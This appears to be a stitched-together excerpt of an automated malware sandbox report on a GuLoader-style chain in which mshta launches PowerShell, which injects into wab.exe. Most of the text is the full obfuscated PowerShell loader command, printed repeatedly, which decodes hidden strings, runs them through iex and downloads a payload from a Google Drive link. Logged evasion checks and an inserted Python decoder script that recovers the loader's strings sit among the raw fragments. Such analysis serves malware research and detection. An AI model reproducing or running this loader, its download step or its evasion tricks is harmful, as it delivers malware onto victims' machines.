';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend Jump to behavior
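The three process-creation entries above record the loader's string decoder in full: `$fostrene` is assembled as `Substring`, and `Skftendes` walks each blob from index 5 in steps of 6, taking one character per step and stopping before the last character, so every real character is preceded by five filler characters. `bifilar` then dot-sources whatever was decoded through `$Aaretags`. The Python script below is an added analysis aid, not code from the sample, from GuLoader or from this report; only the decoder parameters and the blobs are taken from the entries above, while `encode_like_loader`, the variable labels and the URL pattern check are my own additions. Caveat about the page copy: extraction has dropped some non-ASCII filler characters (visible wherever a junk chunk is only four letters, for example in the User-Agent and the `cmd /c` strings), which shifts the stride for the rest of that blob, so those blobs are deliberately left out. Decoding the intact ones shows `$Aaretags` resolving to `iex`, a Google Drive download URL assigned to `$Enebrrets`, a `cmd /c` call that expands `$Luminarism`, the URL being split on `$Foliose`, and a `System.Net.WebClient` being created for the download.

```python
"""Re-implementation of the string decoder used by the obfuscated PowerShell
command line logged above (the function the sample names Skftendes), plus a
driver that decodes the blobs which survive intact in this report.

Added analysis script; not code from the sample, from GuLoader or from the
report.  Only the decoder parameters and the blobs are copied from the page.
"""
import re

# Decoder parameters exactly as written in the logged script:
#   $Ungelatinizables = 1                      -> Substring length 1
#   For($i=5; $i -lt $s.Length-1; $i+=6) { ... } -> start 5, stride 6,
#                                                  final character skipped
START, STRIDE = 5, 6


def skftendes(blob: str, start: int = START, stride: int = STRIDE) -> str:
    """Take every `stride`-th character from `start`, stopping before the
    last character, exactly as the loader's loop does."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, stride))


def encode_like_loader(plain: str, junk: str = "xxxxx") -> str:
    """Inverse of skftendes (assumed helper, not in the sample): prefix each
    payload character with five filler characters and append one filler
    chunk whose last character the decoder skips.  Useful for building test
    vectors when writing detections for this decoder pattern."""
    assert len(junk) == STRIDE - 1
    return "".join(junk + ch for ch in plain) + junk + " "


# Blobs copied verbatim from the process-creation entries above.  Blobs whose
# non-ASCII filler was lost during page extraction (User-Agent, cmd /c) are
# omitted because the 6-character stride no longer lines up for them.
BLOBS = {
    "Aaretags": "Kn gliFlereeNeutrx Azim ",
    "Enebrrets": "InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ",
    "bifilar_1": "Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ",
    "bifilar_2": "z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ",
    "bifilar_3": " Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ",
}

# Shape of the download URL the loader assigns to $Enebrrets (my pattern).
DRIVE_DOWNLOAD_RE = re.compile(
    r"^https://drive\.google\.com/uc\?export=download&id=[\w-]+$")


def decode_all(blobs: dict = BLOBS) -> dict:
    """Decode every blob; returns {variable label: plaintext}."""
    return {name: skftendes(blob) for name, blob in blobs.items()}


def decoded_url(blobs: dict = BLOBS) -> str:
    """The URL the loader stores in $Enebrrets and later splits on $Foliose."""
    return skftendes(blobs["Enebrrets"])


def is_drive_download_url(url: str) -> bool:
    """True when the decoded string is a Google Drive direct-download link."""
    return DRIVE_DOWNLOAD_RE.match(url) is not None


if __name__ == "__main__":
    for name, text in decode_all().items():
        print(f"{name:10s} -> {text}")
    print("drive download link:", is_drive_download_url(decoded_url()))
```

Run it directly to print each decoded string. If a later sample of this stager uses a different offset or stride, `START` and `STRIDE` are the only knobs to change; the round trip through `encode_like_loader` is a quick way to confirm the decoder still matches before pointing it at new blobs.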
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00CB33D2 push esp; retf 1_2_00CB33F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00CB3458 push eax; iretd 1_2_00CB3471
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00CB3A64 push ebx; retf 1_2_00CB3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_06E208C2 push eax; mov dword ptr [esp], ecx 1_2_06E20AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_248ACAF3 push esp; retf 17_2_248ACAF5
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (177 identical entries)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX (52 identical entries)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 248A0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 24AF0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 24990000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7400
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2347
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4461
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2516 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076 Thread sleep count: 5391 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076 Thread sleep count: 4461 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: svchost.exe, 00000004.00000002.2411667354.000001BF4082B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPp
Source: powershell.exe, 00000001.00000002.1749219645.0000000006DDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmasaDiioddDreilFNamagi UsselB.rneeFlag.(Ulovm$,taurE Ok.endecoceUnhoubCitrorAvitarKlt ieTr ketVirils Un v, S.de$I.oprAGratip Pra h adeatLbelshMimreo F,reiGymnad Anme) Prim ';$Cancerne63=$Ballone[1]+$Cancerne63;$Aphthoid=$Ballone
Source: svchost.exe, 00000004.00000002.2414082915.000001BF45E53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1521375542.00000000072D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 91FC30
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors 